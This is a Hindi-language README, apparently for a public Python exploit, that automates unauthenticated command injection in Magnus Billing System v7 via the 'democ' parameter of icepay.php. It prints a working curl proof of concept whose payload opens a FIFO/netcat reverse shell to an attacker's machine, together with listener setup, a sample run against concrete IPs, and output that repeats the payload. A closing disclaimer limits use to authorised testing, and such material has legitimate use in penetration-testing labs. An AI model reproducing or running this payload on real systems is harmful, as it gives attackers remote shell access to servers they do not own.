
यह Python स्क्रिप्ट Magnus Billing System v7 में कमांड इंजेक्शन भेद्यता के शोषण को स्वचालित करती है, विशेष रूप से /mbilling/lib/icepay/icepay.php पर स्थित icepay.php स्क्रिप्ट में। यह एक्सप्लॉइट लक्षित सिस्टम पर मनमाने कमांड निष्पादित करने के लिए democ पैरामीटर का उपयोग करता है, और अंततः हमलावर-नियंत्रित मशीन के लिए एक रिवर्स शेल स्थापित करता है।
यह भेद्यता एक क्राफ्टेड GET अनुरोध के माध्यम से बिना प्रमाणीकरण के कमांड इंजेक्शन की अनुमति देती है। मूल प्रूफ-ऑफ-कॉन्सेप्ट (PoC) ने निम्नलिखित curl कमांड का उपयोग किया था:
curl -s 'http://<TARGET_IP>/mbilling/lib/icepay/icepay.php' --get --data-urlencode 'democ=;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <ATTACKER_IP> <PORT> >/tmp/f;'
यह स्क्रिप्ट उस प्रक्रिया को स्वचालित करती है, जिससे इसे कमांड-लाइन तर्कों के माध्यम से कॉन्फ़िगर किया जा सकता है।
requests लाइब्रेरी का उपयोग करता हैrequests Python मॉड्यूल स्थापित करें:
pip install requests
netcat (nc) स्थापित होना चाहिएnetcat लिसनर सेट करेंicepay.php स्क्रिप्ट सुलभ होनी चाहिएexploit.py के रूप में सहेजेंnetcat लिसनर शुरू करें:
nc -lvnp <PORT>
<PORT> को अपने चुने हुए पोर्ट (जैसे, 443) से बदलेंpython exploit.py -t <TARGET_IP> -a <ATTACKER_IP> -p <PORT>
पैरामीटर:
-t, --target: लक्षित Magnus Billing System का IP पता-a, --attacker: रिवर्स शेल प्राप्त करने के लिए आपका IP पता-p, --port: रिवर्स शेल के लिए आपकी मशीन पर पोर्टpython exploit.py -t 10.10.160.86 -a 10.8.64.79 -p 443
अपेक्षित आउटपुट:
=== Magnus Billing System v7 Exploit ===
Command Injection via icepay.php - Reverse Shell
=======================================
[+] Targeting: http://10.10.160.86/mbilling/lib/icepay/icepay.php
[+] Attacker: 10.8.64.79:443
[+] Sending payload: ;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.8.64.79 443 >/tmp/f;
[+] Request sent successfully!
[*] Check your netcat listener (e.g., 'nc -lvnp 443') for a shell.
netcat लिसनर पर स्विच करेंnetcat के साथ FIFO-आधारित रिवर्स शेल (mkfifo) का उपयोग करती हैexploit() फ़ंक्शन में print(response.text) अनकमेंट करेंnetcat स्थापित हैयह टूल केवल शैक्षिक और सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है। इसका उपयोग केवल उन्हीं सिस्टमों पर करें जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति है। जिन सिस्टमों के आप स्वामी नहीं हैं या जिनके परीक्षण के लिए आपके पास सहमति नहीं है, उनके खिलाफ अनधिकृत उपयोग अवैध और अनैतिक है। लेखक इस स्क्रिप्ट के किसी भी दुरुपयोग या क्षति के लिए ज़िम्मेदार नहीं है।
यह प्रोजेक्ट MIT लाइसेंस के तहत जारी किया गया है। अस्वीकरण को बरकरार रखते हुए इसे आवश्यकतानुसार संशोधित और वितरित करने के लिए स्वतंत्र महसूस करें।
योगदान, बग रिपोर्ट और फीचर अनुरोधों का स्वागत है। कृपया बेझिझक पुल अनुरोध सबमिट करें या एक issue खोलें।